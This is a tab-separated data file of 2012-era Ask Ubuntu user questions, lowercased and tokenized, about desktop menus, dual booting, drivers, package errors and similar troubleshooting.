223624	unity top menu keyboard shortcuts for desktop alone , no programs running : unity 2d vs 3d	this is a problem with unity 2d on 12.04 . more advanced 3d has no such issue . alt+f1 accesses the launcher menu , with arrow keys to navigate the list ( side menu ) . alt+f10 accesses the top bar in an open application ( or alt+an underlined menu item letter ) , which allows access to the global ubuntu settings in the top right ( battery , wifi/networking , audio , time/calendar , user , power ) . alt+f10 , when no application is open and you 're just staring at the desktop , accesses those ubuntu settings immediately . but the top menu bar does list , in the top left , menu commands for the desktop per se ( create new folder , go home , help , start server , etc ) . these can be accessed only by mouse hovering and click . no way to get to them only by keyboard ( arrow keys just cycle through the settings , do n't jump over to the left side of the top bar ) . is there a keyboard shortcut way to access the desktop menu bar for manipulating icons on your desktop and other general things ? or is this a work in progress for unity ? if you use the context menu key ( or some equivalent you 've set to generate that signal ) along with other shortcuts for working on the desktop , you can cover most of the functionality of the top menu bar . however , i do n't want to memorize those keys to become proficient . i just want a way to open and browse through those menu items ( and they are n't all available through hotkeys anyway ) .
223629	how do i remove facebook from this menu ?	i was on facebook when firefox asked me if i want to install facebook for `` extra features '' and i clicked `` install '' but now i want it gone . i ca n't seem to find any remove option in software center nor firefox .
223630	gnome-shell themes work with unity ?	is there a way to make gnome-shell themes work with unity ? thanks !
223631	sublime text 2 : no module named __future__	i lost track of how many times i 've been bumping into this issue with different oses . now with ubuntu 12.10 64-bit . okay , the problem is on startup of sublime text an error message saying among other things no module named __future__ appears and it 's impossible to launch the application . what should i do ?
223633	ubuntu installed along side win 8 but not shown in boot	actually the question says it all , but let me tell you what i did , so u may find exactly what might have went wrong : i have win 8 installed on 500 gb hdd . so i shrunk it four times for : partition 1 - the original partition containing win 8 sys ( 118gb ) partition 2 - ntfs formatted for my data ( 188gb ) partition 3 - ntfs formatted for my data ( 100gb ) partition 4 - ntfs formatted for linux distro say ubuntu ( i reformatted it to ext4 during ubuntu installation ) ( 25gb ) partition 5 - ntfs formatted for linux distro ( am thinking to try mint in it ) ( 21gb ) so now i booted ubuntu from usb ( created from ubuntu-12.04-desktop-amd64.iso ) and deleted last two partitions 4 and 5 to create : partition 1 - ext4 where i installed ubuntu ( 25gb ) partition 2 - swap ( 4gb ) partition 3 - unallocated space , not formatted yet ( 17gb ) ubuntu installation said it installed successfully and that i have to restart to boot in ubuntu . but when i restart windows 8 auto booted - there was no dual boot . after that i devided above 100gb partition to 80gb and 20gb ones ( since i read online that i should have /home in separate partition for convenience , so i created 20gb partition for it ) so i went on to manually create boot entry using easybcd as below show in picture at below link when i created the entry , freebcd showed the information as follows : windows boot manager -- -- -- -- -- -- -- -- -- -- identifier { 9dea862c-5cdd-4e70-acc1-f32b344d4795 } device partition=\device\harddiskvolume2 description windows boot manager locale en-us inherit { 7ea2e1ac-2e61-4728-aaa3-896d9d0a9f0e } integrityservices enable default { ea8167ad-d189-11e1-90e4-ab2f09569dcc } resumeobject { ea8167a3-d189-11e1-90e4-ab2f09569dcc } displayorder { ea8167ad-d189-11e1-90e4-ab2f09569dcc } { ea8167b1-d189-11e1-90e4-ab2f09569dcc } toolsdisplayorder { b2721d73-1db4-4c62-bf78-c548a880142d } timeout 10 displaybootmenu yes windows boot loader -- -- -- -- -- -- -- -- -- - identifier { ea8167ad-d189-11e1-90e4-ab2f09569dcc } device partition=c : path \windows\system32\winload.exe description windows 8 locale en-us osdevice partition=c : systemroot \windows resumeobject { 9bc7fdf7-3ae0-11e2-be77-806e6f6e6963 } real-mode boot sector -- -- -- -- -- -- -- -- -- -- - identifier { ea8167b1-d189-11e1-90e4-ab2f09569dcc } device partition=c : path \nst\autoneogrub0.mbr description ubuntu notice the last bolded entry created . howevever after thet , when i rebooted it firstly showed old dos like bootloader ( no windows 8 ui based bootloader ) with two entries windows and ubuntu . windows 8 was booting correctly but i was getting an error while booting ubuntu taking me to grub rescue . update : now , i rebuilt windows bootloader from windows disk with command bootrec /rebuildbcd . so currently there is no dual boot menu . it loads windows . then i booted ubuntu from live usb and tried to install grub , but it said command not found , so i tried to set path as follows but it did not worked . this occcured : ubuntu @ ubuntu : ~ $ sudo grub sudo : grub : command not found ubuntu @ ubuntu : ~ $ sudo /sbin/grub sudo : /sbin/grub : command not found is it like that during installation only ubuntu was installed on the partition but no grub were installed . that may be the reason for the failure of auto grub bootloader entry ( last entry ) created by freebcd since it is not able to find grub in any partition . this may be the reason for failure of sudo grub . so what should i do next ? please help am new to linux world .
223639	unity gone , have tried everything 12.04	i have checked a few forums and tried much of the advice given , however nothing has worked so far . i dont know how it happened but when i boot up , i get the login screen to select user and once i select my user and input password my screen displays my background image but never loads cairo dock or the unity sidebar . i have tried unity -- reset from tty1 and get asked if i 'm actually trying to do a reset from a tty . i have also tried ctrl+alt+t after logging in to get a terminal and tried to open ccsm to restart unity from there and that has not worked either . any ideas ?
223640	security aspects of home dir encryption	changing the login password will automatically make an encrypted home directory re-accessible , as pam takes care that the ectual encryption key is available with the new password . does n't this imply that someone who steals my laptop can simply boot it from another medium , like a dvd , change the user password and reboot the system from the native harddisk to get access to my nicely encrypted data ? in other words , is n't the encryption actually only protecting against the most un-educated of thieves ?
223642	global menu broken for gnome applications after adding gnome 3 ppa	after using the gnome3 ppa to upgrade nautilus , ( i have been working with it for several days without problems ) , the global menu broke for all gnome-application , like totem , gnome-terminal , nautilus 3.4 , etc ... ) . at the same time , when i launch any of these applications from terminal , i get the following error : gtk-warning ** : theme parsing error : gtk-widgets.css:62:17 : theming engine 'unico ' not found i purged the gnome3 ppa , re-updated , auto-cleaned , dist-upgraded , downgraded nautilus , reinstalled the gtk3-engines-unico and appmenu , but in vain . anyone has a clue of fixing this ? ~ $ apt-cache policy gtk3-engines-unico gtk3-engines-unico : installed : 1.0.2+r139-0ubuntu2 candidate : 1.0.2+r139-0ubuntu2 version table : *** 1.0.2+r139-0ubuntu2 0 500 http : //archive.ubuntu.com/ubuntu/ quantal/main amd64 packages 100 /var/lib/dpkg/status ~ $ apt-show-versions gtk3-engines-unico gtk3-engines-unico/quantal uptodate 1.0.2+r139-0ubuntu2 the unico issue seems to be known in rr.13.04 . i have installed gtk3-engines-unico from rr-13.04 , to see if it fixes the issue but in vain . now i get a different error message when running a gnome application from terminal : failed to load type module : ( null ) menu_proxy_module_load ' : /usr/bin/python : undefined symbol : menu_proxy_module_load but what about 12.10 ?
223649	how to play bbc 6 music on rhythmbox	how do i get bbc 6 music radio station to play on rhythmbox ? i get the following pop-up message : python ( v2.7 ) requires to install plugins to play media files of the following type : text/html decoder and now i am stuck . yes , i am a newbie , i much prefer ubuntu but i do struggle some of the time ... . ( some ? ) and what is a tag ?
223654	how to install spotify gnome ?	i want to have media key support in spotify , and searching around saw a program called `` spotify gnome '' recommended . but , when i go to the site linked to , i ca n't figure out where to go to download a .deb , only how to get the source . is the only way to compile it myself ? ! what repository do i have to add ? can anyone give me a quick rundown on how to install spotify gnome ?
223655	windows ubuntu dual boot - share files between os	well i have a netbook , so i ca n't play games on windows either , no problem . but i 'm getting a new desktop pc with better hadware and it will be able to run the most popular games and i want to have windows on it to play games and software not compatible with ubuntu . i also want to have ubuntu , as my primary os , so i will set a dual boot . in this computer i will have a small ssd with both os and a second drive ( a 500gb hdd ) to store my files . i want to avoid copying files from one os to another every time i , ie , download a file . my question is : is there any way that i could make both os use that hdd for home , like set it as ntfs and make ubuntu mount it on /home and also make windows to store user files , like my documents , my videos and downloads , etc , on that partition ?
223657	application deployed in tomcat ca n't create files on /usr/share/tomcat7/	i have a tomcat server which is working fine with applications like jenkins . i 'm trying to load my application which tried to create a h2 database on ~/xinco/data which translates to /usr/share/tomcat7/ at runtime . i got this error : javax.persistence.persistenceexception : exception [ eclipselink-4002 ] ( eclipse persistence services - 2.4.0.v20120608-r11652 ) : org.eclipse.persistence.exceptions.databaseexception internal exception : org.apache.commons.dbcp.sqlnestedexception : can not create poolableconnectionfactory ( error while creating file `` /usr/share/tomcat7/xinco '' [ 90062-168 ] ) i went ahead and created the xinco/data folder but it still fails creating other database related files . i 'm sure is something on the permissions for the tomcat user . any hints ?
223661	ca n't connect nonlocally after 12.10 upgrade	i 've just upgraded one of my systems from 12.04 to 12.10 . now i ca n't connect on that system beyond my local network . connections within the local network seem to work fine , and i can make nonlocal connections from other machines ( like the one i 'm asking this question from ) . i suspect that some routing information has been messed up , but i do n't know where to look for it . it 's not a nameserver problem -- pinging outside sites by their ip addresses does n't work either . i have another laptop next to this one , also running kubuntu 12.10 . on the one that ca n't connect , arp produces no output . on the other one , it produces 192.168.0.1 ether 00:23:69 : fa : ce : ae c wlan0 on the working machine , the output of netstat starts with some tcp entries . on the nonworking one , those entries are absent . i asked this question on the ubuntu forum but have n't gotten any answers there . one further complication : since the troublesome machine has no outside connection , it 's extremely difficult to download anything to it . for what it 's worth , `` ping 8.8.8.8 '' produces `` connect : network is unreachable '' . update : after a lot of fiddling , i have my external world back . i do n't know what the key action was , but the first indication of progress was that `` ping 8.8.8.8 '' worked . at that point i still did n't have a working nameserver , so external urls did n't work . but i did this ( based on an online post , of course ) : sudo dpkg-reconfigure resolvconf and answered yes to all prompts . that did the trick ! ! apparently my problem was unique , or close to it , since i could n't find any online references to it : local net working , remote net not working , including explicit ip addresses . so i suppose that if no one else has this problem , no one cares about the solution ! !
223662	where do webapps install after accepting them	i am trying to find where do webapps install after accepting them with firefox . this can help me when i want to eliminate one of them or edit something .
223665	is it possible to reorder my places in nautilus ?	i just upgraded to the latest lts , and now i 'm setting things up for the next couple of years . i know this is petty : is it possible to reorder my places in this new nautilus ? i am used to file system being first in the list , and downloads being last ( above the trash ) . it just makes more sense to me . i 've snooped around the dconf , and a few of the tweak tools , to no avail .
223666	how to install sunbird in ubuntu 12.10 ?	how do i install sunbird in ubuntu 12.10 ? i have the tar.bz2 file but i 'm unsure what to do with it . when i extract it and click the executable nothing happens . i have checked the box that says allow executing file as a program .
223671	dual boot on two hard drives : ca n't access secondary hd through bios	i installed ubuntu today for the first time on a dell desktop running windows xp sp3 . i opted to install on a second hard drive , following these instructions . when i reboot my computer , and enter the boot sequence menu in bios , there is n't even an entry for my second hard drive . every option i select just results in xp booting , and the drive is not recognizable there either , which i expected . i know the hard drive is working . i 've been using it on this computer for months previous to the ubuntu install . i tried boot repair , and it came up with this : boot info script but did nothing to help the issue . ideas ?
223677	laptop wo n't boot or enter bios after deleting partition in windows 7	i dual boot my computer and later decided to delete one of the ubuntu partitions while using windows 7 . after my computer hibernated and i tried restarting my asus laptop it stopped at the logo and preventing me from entering the bios . when i take out my hard dive it allows me to enter the bios . it does not boot from a cd if the hard drive is still attached to the computer . after taking the hard drive out then it boots from the cd . can someone please help ?
223678	awkward shut down	i have a dell latitude d830 with just ubuntu 12.04 . recently after i installed it , the shutdown worked fine . recently , it has decided to stay on all night , and still be on when i wake up . help please !
223684	mythbuntu htpc : disk usage for a normal install	about to build a new system , one of the information missing in mythbuntu docs is the disk usage of a typical install for home theather pc ( htpc ) usage . not interested in fresh install or bare bones numbers . how much does your current system uses ? not counting media , of course , but with all the essentials installed . this box will probably work for both the backend and frontend . thanks !
223686	problems with my intel hd gc	i 'm running ubuntu and i have an intel hd graphic card , i installed counter strike 1.6 and i can not launch wide screen display mode , parts from the both side of my screen are black . also when i am playing some clips on youtube , both sides on the screen are black and i do n't see the whole picture . when i click on `` about this computer '' i 'm getting this : intel速 sandybridge mobile x86/mmx/sse2 but i ca n't find the driver for my intel gc . i have this driver installed : x.org x server -- intel i8xx , i9xx
223689	was trim support backported into the 2.6.32 kernel that is in 10.04 ?	i have found conflicting answers to this around the web , even a link to a launchpad bug : https : //bugs.launchpad.net/ubuntu/+source/linux/+bug/571476 which is kind of left hanging . so i 'm curious , was trim support backported into the 2.6.32 kernel that is in 10.04 ? does anyone know for sure ? edit although the above launchpad bug is relevant , it 's this bug that is linked from the last comment on the above one that is most relevant : https : //bugs.launchpad.net/ubuntu/+source/linux/+bug/644694 in this , for lucid update to 2.6.32.22 stable release there is listed under : the following patches are in the 2.6.32.22 stable release : * sata_mv : fix broken dsm/trim support ( v2 )
223691	how do i create a script file for terminal commands ?	in windows i can write a file containing commands for cmd ( usually .cmd or .bat files ) . when i click on those files it will open cmd.exe and run them commands the file contains . how would i do this in ubuntu ? i 'm sure this is a duplicate , but i ca n't find my answer . its similar to these questions , but they do n't answer the question : store frequently used terminal commands in a file cmd.exe emulator in ubuntu to run .cmd/.bat file
223702	ubuntu server 12.04 forked-daapd 5 minute time out issue	i have a server running ubuntu 12.04.1 lts and i have installed forked-daapd but i am having the issue where forked-daapd stops working after five minutes of use . has anyone been able to get around this issue ? i believe there is a fix for this but i have n't found a way to install that in ubuntu 12.04 . any help is appreciated . thanks , prince
223711	i installed ubuntu 12.10 from downloaded iso file to dvd but cant do anything-	but am not able to access anything from a blank desktop - i am able to ctrl alt del back to the sign in screen where i can restart suspend or shutdown from the toolbar icon which does not appear at all
223712	what to do when : '' the following packages have unmet dependencies ''	when i try to install wine , playonlinux , and some other programs , i get the following message : at the terminal : the following packages have unmet dependencies : wine : depends : wine1.5 but it is not going to be installed e : unable to correct problems , you have held broken packages . at the software center : package dependencies can not be resolved this error could be caused by required additional software packages which are missing or not installable . furthermore there could be a conflict between software packages which are not allowed to be installed at the same time . i already tried installing them with `` aptitude '' and failed . i am running ubuntu 12.10 please help ! i 've had this problem for a while now and do n't know what to do !
223716	how to change defaulkt soundcard getting past password silliness on my own computer	'' [ sudo ] password for metta : metta is not in the sudoers file . this incident will be reported . you have new mail in /var/mail/metta '' what does this mean ? all i want to do is change the default soundcard . as in : '' *in a shell , type cat /proc/asound/modules this will give the the name and index of each soundcard you have currently . make a note of the names , and decide which one you want to be the default card . *now type sudo nano /etc/modprobe.d/alsa-base.conf at the very end of the file , add the following ( assuming you have 3 cards with module names a , b and c and you want to have them in the order cab ) options snd-c index=0 options snd-a index=1 options snd-b index=2 '' when i do this i get : '' metta @ mine : ~ $ /etc/modprobe.d/alsa-base.conf bash : /etc/modprobe.d/alsa-base.conf : permission denied metta @ mine : ~ $ sudo nano /etc/modprobe.d/alsa-base.conf we trust you have received the usual lecture from the local system administrator . it usually boils down to these three things : # 1 ) respect the privacy of others . # 2 ) think before you type . # 3 ) with great power comes great responsibility . [ sudo ] password for metta : metta is not in the sudoers file . this incident will be reported . '' ( to whom ? ! ! ! crazy computer ! ! ! ) ( metta is my user name )
223718	how to remove bandwidthd 32 bit from 64 bit xubuntu	i downloaded bandwidthd from here and tried to install it using ubuntu software center . it failed , but still it breaks my xubuntu . later i found that it is for 32 bit while mine is 64 bit system . now apt-get no longer working because it stuck with bandwidthd error . apt-get remove bandwidth , resulted in error : the following packages have unmet dependencies : bandwidthd : i386 : depends : ucf : i386 but it is not installable sudo apt-get -f install , error : sh : 0 : getcwd ( ) failed : no such file or directory dpkg : error processing bandwidthd : i386 ( -- remove ) : package is in a very bad inconsistent state - you should reinstall it before attempting a removal . errors were encountered while processing : bandwidthd : i386 please help me .
223721	ubuntu desktop installation problem , a lot of error messages	i am getting error messages while trying to install ubuntu 12.04 on my desktop ( intel pentium d ) . the error messages are : *checking battery state ... [ 412.633532 ] end_request : i/o error .dev sr0 , sector 1291684 [ 435.997503 ] squashfs error : squashfs_readdata failed to readbloack 0x275fcda4 [ 435.9975xx ] squashfs error : unable to read fragment cache entry page [ 275fcda4 ] ... [ 524.000055 ] exception emask 0x0 sact 0x0serr 0x0 action 0x6 frozen ata5.00 : cmd a0/00:00:00:08:00/00:00:00/00 tag0 pio 16392 in res 58 /00:02:00:08:00/00/a0 emask 0xf ( timeout ) [ 524.000292 ] ata5.00 status : { drdy drq } i was able to install on another pc ( intel atom ) but not on this pc ( intel pentium d ) , can any one help me in successful installation ? thanks !
223724	is it possible to create hotspot ( infrastructure ) from wireless ?	i have 2 wireless cards , internal & usb wifi . i am connected to the internet with my usb wifi which means that my internal wifi is idle all the time . i want to hook up my ps3 to the net as well , but ps3 does n't see the internet signal also it is too far to drag an ethernet cable from the router to the ps3 . thus i want to share via my laptop . ps3 is a bit of a retard and does n't see ad-hoc , so i am gon na try to use ubuntu for this . i wonder is there a way to create infrastructured hotspot . i have successfully created adhoc hotspot between wired and wifi before in ubuntu , but now when i go to create hotspot with my idle wifi it creates it , but i can not see it , i tried with my android , another pc and ps3 , not there . what would you suggest , thanks or should i rather bridge the connections somehow ?
223725	lubuntu 12.10 cpu usage sticks at 100 %	i 've upgraded lubuntu 12.04 to 12.10 via the update manager . now when lubuntu is loaded , the cpu usage drops to 0 % for a few seconds then shoots up to 100 % where it stays for 15 or 20 minutes . i downloaded the iso and did a full re-install but it still occurred . the same thing happens when running lubuntu 12.10 from the install disk . i threw in the 12.04 disk and everything was fine so it seems to be a 12.10 problem . task manager shows cpu at 100 % on the bar graph but negligable cpu usage in the list . running top in terminal shows the same , ie very little cpu usage except wa ( i/o wait ) which stays in the high 90 's . if i run a program , wa drops but shoots up again after the program loads so this is n't really affecting the computers performance but i 'd still like to know what the cause of it is . also , logging out and back in after the cpu usage has come down restarts the problem . system information : northwood pentium 4 2.6ghz 533 on a microstar ms6533e mobo , 1gb ddr266 ram , 80gb pata hdd output from top -n1 | head -n15 top - 09:03:05 up 6 min , 2 users , load average : 1.05 , 0.94 , 0.47 tasks : 118 total , 1 running , 117 sleeping , 0 stopped , 0 zombie % cpu ( s ) : 8.5 us , 3.6 sy , 0.6 ni , 2.8 id , 84.4 wa , 0.0 hi , 0.1 si , 0.0 st kib mem : 1027016 total , 411788 used , 615228 free , 39092 buffers kib swap : 1048572 total , 0 used , 1048572 free , 235008 cached pid user pr ni virt res shr s % cpu % mem time+ command 1751 peter 20 0 5452 1284 972 r 6.3 0.1 0:00.01 top 1 root 20 0 3596 1924 1244 s 0.0 0.2 0:00.96 init 2 root 20 0 0 0 0 s 0.0 0.0 0:00.00 kthreadd 3 root 20 0 0 0 0 s 0.0 0.0 0:00.07 ksoftirqd/0 4 root 20 0 0 0 0 s 0.0 0.0 0:00.20 kworker/0:0 5 root 20 0 0 0 0 s 0.0 0.0 0:01.13 kworker/u:0 6 root rt 0 0 0 0 s 0.0 0.0 0:00.00 migration/0 7 root rt 0 0 0 0 s 0.0 0.0 0:00.00 watchdog/0
223726	get all applications that can open a specific file ( using the command line )	i want to write my own `` open with '' gui for ubuntu . in ubuntu , is it possible to get a list of applications that can open a specified file ( from the command line ? )
223731	how do i install itunes 11 on ubuntu ?	i want to install and try out itunes 11 on ubuntu , but i do n't really know how . i do n't want to dual boot / use virtualbox to run windows .
223738	how do i check available displays	when you know what display you want apps to start by default you would do something like : export display=localhost:0.0 but suppose miss daisy , which is a frisky windows user that is giving linux a chance , is trying to figure out the available displays values she can set this variable to . she probably expects something like localhost:0.0 0.1 1.0 ... how does miss daisy query such basic information about her system in the command line ?
223741	unable to install software through ubuntu sotware centre on ubuntu 9.10	i tried to install gparted through usc and an error showed up `` installarchive ( ) failed : '' . trying to install any other software also gives the error . any suggestions on how to remove the error or install by any other means ?
223742	cli mod ( root ) dont accept login credentials on ubuntu 12.10	to install nvidia 304.64 driver on ubuntu 12.10 i need to login as root but it doeant accept my username and password and says incorrect login i also has created a root password but still have the problem what can i do ? tnx
223753	ubuntu 12.10 does n't recognize wireless network it 's been connected during installation	while installing ubuntu i connected it to my wi-fi network . but as installation finished i could n't connect to that same network again because ubuntu does n't see it . it does still see other networks but not mine . changing network name did not help nor did connecting to hidden wireless network . can anyone help me with this problem ? i 'm sure i 'm not alone having this issue but i could n't find the answer . thanks in advance ! p.s . i believe re-installation without connecting to wireless would help , but i want to solve it another way .
223756	save and run programs from usb	at the moment i am running ubuntu 12.10 from a usb memory stick , and i wondered whether it would be possible to save and run any programs i have downloaded from another usb stick instead of the one with the operating system on . i 'd like to be able to set the download location in ubuntu software center to the second memory drive , but i do n't know how to do this . i can keep the operating system on the one usb and the programs on the other usb , which makes everything much more easier . any ideas ?
223757	i keep getting http error 500 how do i fix	when accessing some internet sites i keep getting http error 500 how do i fix ?
223758	i/o memory conflicts	i recently bought a arctic mc101 barebone ( http : //www.arctic.ac/en/p/living/office-pc/572/mc101-barebone-a10-4600m.html ? c=2296 ) to run xbmc . i 've installed ubuntu 12.04 on this machine and the latest 3.6.8 kernel . i 'm not able to get the built-in ir receiver to work ( tested on windows , ok ) . the nuvoton_cir module failed to probe the device : [ 2.537309 ] nuvoton_cir : w83677hg-c : chip id : 0xc3 0x33 [ 2.537340 ] nuvoton_cir : cir initialized , base io port address : 0x400 , irq : 3 [ 2.537385 ] nuvoton_cir : cir wake initialized , base io port address : 0x420 , irq : 3 [ 2.537509 ] nuvoton-cir 00:0a : disabled [ 2.537513 ] nuvoton-cir : probe of 00:0a failed with error -16 it seems there is a memory address conflict with another device on the main board : cat /sys/bus/pnp/devices/00\:0a/resources state = disabled io 0x400-0x40f irq 3 io 0x420-0x42f cat /sys/bus/pnp/devices/00\:02/resources state = active io 0x10-0x1f io 0x22-0x3f io 0x63-0x63 io 0x65-0x65 io 0x67-0x6f io 0x72-0x7f io 0x80-0x80 io 0x84-0x86 io 0x88-0x88 io 0x8c-0x8e io 0x90-0x9f io 0xa2-0xbf io 0xb1-0xb1 io 0xe0-0xef io 0x4d0-0x4d1 io 0x40b-0x40b io 0x4d6-0x4d6 io 0xc00-0xc01 io 0xc14-0xc14 io 0xc50-0xc51 io 0xc52-0xc52 io 0xc6c-0xc6c io 0xc6f-0xc6f io 0xcd0-0xcd1 io 0xcd2-0xcd3 io 0xcd4-0xcd5 io 0xcd6-0xcd7 io 0xcd8-0xcdf io 0x800-0x89f io disabled io 0x0-0xf io 0xb20-0xb3f io 0x900-0x90f io 0x910-0x91f io 0xfe00-0xfefe io disabled io disabled mem 0xfec00000-0xfec00fff mem 0xfee00000-0xfee00fff mem 0xfed80000-0xfed8ffff mem 0xfed61000-0xfed70fff mem 0xfec10000-0xfec10fff mem 0xfed00000-0xfed00fff mem 0xff000000-0xffffffff as you can see , the pnp device 00:02 uses the memory 0x40b which overlaps the request memory range of the ir receiver ( 0x400-0x40f ) . how can i prevent this ? i 've doubts on bios on this machine ... thanks a lot . mathieu
223759	how to read correctly `` free -m '' output ?	the output of free -m : total used free shared buffers cached mem : 595 482 112 0 63 324 -/+ buffers/cache : 93 501 swap : 0 0 0 which value of free memory is correct 482 or 93 ?
223760	i can not open my files	i had two partitions on my hd under windows . i decided to install ubuntu , hoping it will install on partition where was windows , so i transferred all my files to second partition , and now i can not access them .
223761	ca n't see the installed languages	i have installed the turkish , bulgarian and french language packs from systems setting- > language support and pressed the apply button . i have even restarted the system several times but no success . i ca n't see the installed languages . only the ones installed by default are still visible there . can anyone help me ? many thanks !
223766	how to check in script if upstart event was emited ?	i am running remote connection on session start using xdg autostart script . but sometimes network interface needs more time to start . so i need to check if network is up . is it possible to check if an upstart event was emited ( i.e . net-device-up ) ? thank you .
223770	nvidia ion 2 drivers activated but not used	i just installed ubuntu 12.04 on my zotac box which has an intel atom d525 with nvidia ion 2 . i updated the software and after going to the additional drivers i installed the nvidia_current and nvidia_current_updates . after a reboot i still see a message that says `` this driver is activated but not currently in use '' . when streaming online the video is very choppy and i see that the cpu usage is close to 70 % . also , in the system settings- > details the graphics tab is shown as unknown . any idea how i can get the driver to be used ? thanks for your help with this !
223771	can i have a .desktop launcher for both python2 and python3 depending on version installed ?	after very few issues only i moved my application from python2 to python3 making sure it will still run with python 2.7 , and hence has python > = 2.7 as dependency only . this was mainly done because python3 , and some dependencies are not installed in a default 12.04 lts , and i do not want my users to have to install all python3 only to run my script . when i create an appname.desktop launcher i now need to decide if it starts my application using python2 , or python3 like exec=python /path/app.py exec=python3 /path/app.py but what i would like it to do is to launch the application with the python3 interpreter if python3 is installed . otherwise use python2 if python3 is not installed . how can this be done ? do i need to tell it in my package installation script , or can i have a launcher which can handle both ( in case people install python3 after they had installed my script ) ?
223772	apt-upgrade kernel-image with custom kernel	i 'm running a kernel i compiled myself ( because of this ) and i 'm wondering what apt will do with kernel updates ? the software updater currently lists ( among others ) these points : conmplete generic linux kernel and headers ( linux-generic ) header files related to linux kernel version 3.5.0 ( linux-headers-3.5.0-19 ) * linux kernel image for version 3.5.0 on 32 bit x86 smp ( linux-image-3.5.0-19-generic ( new install ) linux kernel image for version 3.5.0 on 32 bit x86 smp ( linux-image-extra-3.5.0-19-generic ( new install ) generic linux kernel image ( linux-image-generic ) linux kernel headers for development ( linux-libc-dev ) that last one is n't really a problem i presume , but included for completeness . to know what 's going on : will apt try to replace my kernel with a newer one , does it update the default kernel ( i never got rid of any packages for the standard kernel ) and ignores the one in use , or something else entirely ? todo : should i ignore ( deselect ) them during updates ( tricky , that 'll be forgotten once ) , just update them , or should i uninstall some of these packages ?
223775	old fglrx driver - amd radeon hd 3200 - ubuntu wo n't start	i 've been using ubuntu 12.04 64 bit for about 2 weeks now and i installed the latest fglrx driver ( graphics card- amd hd 3200 , pc- acer aspire 5336 , 4gb ram , 500gb harddrive ) . the problem is that sometimes video 's lag and play out of sync sometimes the windows take long to show up after i 've clicked them etc . after looking around i found a video on youtube by ubuntu help guy and in the video he recommended using an older driver if you have an older graphics card , his was about 4 years old ( same as mine ) and he used the 11.10 catalyst driver so i decided to try it . i removed the previous installation of the driver and then installed the 11.10 driver . however , when i restarted it instead of going to the gui it goes to a terminal like window and asks for my login . now its pretty clear i need to remove the old driver and go back to using the latest one . the only problem is i 'm not sure where i saved the latest driver and in order to connect to the internet i need to change /etc/resolv.conf ( i use a static ip ) . so what should i do ? also anyone from personal experience , what propitiatory driver works best with my graphics card ? as in the version . thanks in order to do that i need to connect to the internet and since i use a static ip i normally use gedit to edit the /etc/resolv.conf file with my dns server but i ca n't do that now because i ca n't open gedit . anyway now i uninstalled the fglrx driver and i 've managed to get to the login screen but when i login the screen goes black for a few seconds and then just returns to the login screen . help ! btw the first post was made without an account now i 've decided to make an account .
223780	how to create terminal program launcher ( desktop shortcut ) ?	i am using ubuntu 11.10 win unity 2d . i want to have a launcher which launches application ( sh file ) which outputs many things to console . gnome-desktop-item-edit ca n't help .
223784	creating a legal notice upon login in xubuntu 12.10	how to create a legal notice upon login in xubuntu 12.10 ?
223786	installing wine on a different usb device to ubuntu	can someone please tell me how to use ubuntu 12.10 to install wine onto a separate usb memory stick ? i 've looked for hours on the internet with no luck so far , so help would really be appreciated .
223793	no background after reboot	i changed my background with image of my choice and when i shut down the pc and start it again the wallpaper is blank and i have to set that `` my image '' as background again and again .
223794	how to configure apt-get in ubuntu 11.10 behind proxy ?	i want to configure apt-get in my ubuntu 11.10 version by editing apt.conf file but not getting positive result.pls reply if anybody can ...
223806	i think ubuntu 12.04 deleted windows 7	when my computer starts up , it goes to a purple screen . i can go to the ubuntu side just fine , but when i choose windows 7 it says : error : invalid efi file path . press any key to continue ... so what is wrong ? yes , the boot repair worked , thank you !
223808	is there a small music video player , fixed on desktop to play music videos while doing other things ?	is there a way to play music videos in a small window on top of everything . basically i have some mpeg music videos and would like to play them while i am browsing , but i 'd like to pin it to a part of the desktop that i choose . thanks .
223809	how can i upgrade from ubuntu 9.10 to 11.10 ?	we need to program in cuda 5.0 which can be installed only on ubuntu 11.10 or 12.04 . our current version , 9.10 , is no longer supported , so we chose to proceed with a clean installation . since we have a shared workstation , we used clonezilla for cloning the system . however , booting from the livecd showed an unexpected error . we also tried to install 11.10 in an external hdd by partitioning it , but gparted could not be installed , and terminated with the error `` installarchives ( ) failed '' which we could n't solve even after modifying the sources.list . is there a way to proceed with this upgrade ?
223811	how to apt-get install with only minimal components necessary for an application	apt-get is really great . however , when you want to install an application , you often are forced to install a lot of dependencies which i believe are very often optional . for example , i want to install okular and i 'm ask to install 97 packages / 233mb ! that is a lot . i particularly dislike that it wants me to install nepomuk and a lot of other stuff that has nothing to do with pdf viewing per se , and which implies demons , and many of which are clearly optional but not necessary . question : how to do minimal install with apt-get for a given package , with only the necessary componentents to get the thing run ? it 's ok if some features disabled at first .
223813	media server ( mediatomb ) accessible over internet	i currently have a server installed with ubuntu server 12.04.1 ( first time using linux ) which i would like to configure as a media server . additionaly , i have installed samba , openssh , webmin and mediatomb . at the moment , i created a shared folder that is accessible within the network , and i can play the files i have added in mediatomb using windows media player locally . i can also play it on my android devices over the internet using upnplay ( in combination with an ssh tunnel through connectbot ) . i would also like to stream my music with mediatomb to a windows ( 7 ) computer outside the local network , but have not been able to get this to work . i am using putty to tunnel the required ports , in much the same way as i am doing this with connectbot . doing this , i can access the mediatomb gui , webmin and use vnc , but i ca n't seem to find the server as a upnp device , or see it at all . i have tried several media players ( windows media player , vlc , xbmc , foobar2000 ) but have n't been able to connect with them so far . does anyone know if it is possible to access mediatomb outside a local network on a windows 7 system , or should i look into other software for this ( plex , subsonic ? ) .
223818	ca n't update because the word prox* is blocked	i live in ethiopia and the government blocks all urls with the word `` proxy '' in them . i could n't use that word in the title above because that would make the url contain the word proxy . when i apt-get upgrade i get errors because some packages like libproxy1 , libproxy1-plugin-gsettings , libproxy1-plugin-networkmanager , python-libproxy all contain the p word . therefore , it is all blocked . i tried putting the urls into proxy sites , but they all just returned to their home page . are there any other solutions ?
223823	how can i get a man page for a header	just as the title , i want to man a header like pthread.h , but it can not be reached on ubuntu . however , i used this feature from a computer which has fedora as os , but i do n't know how to configure it . can anyone help me ?
223825	my package manager is damaged i get the following error message	e : could not open lock file /var/lib/dpkg/lock - open ( 13 : permission denied ) e : unable to lock the administration directory ( /var/lib/dpkg/ ) , are you root ?
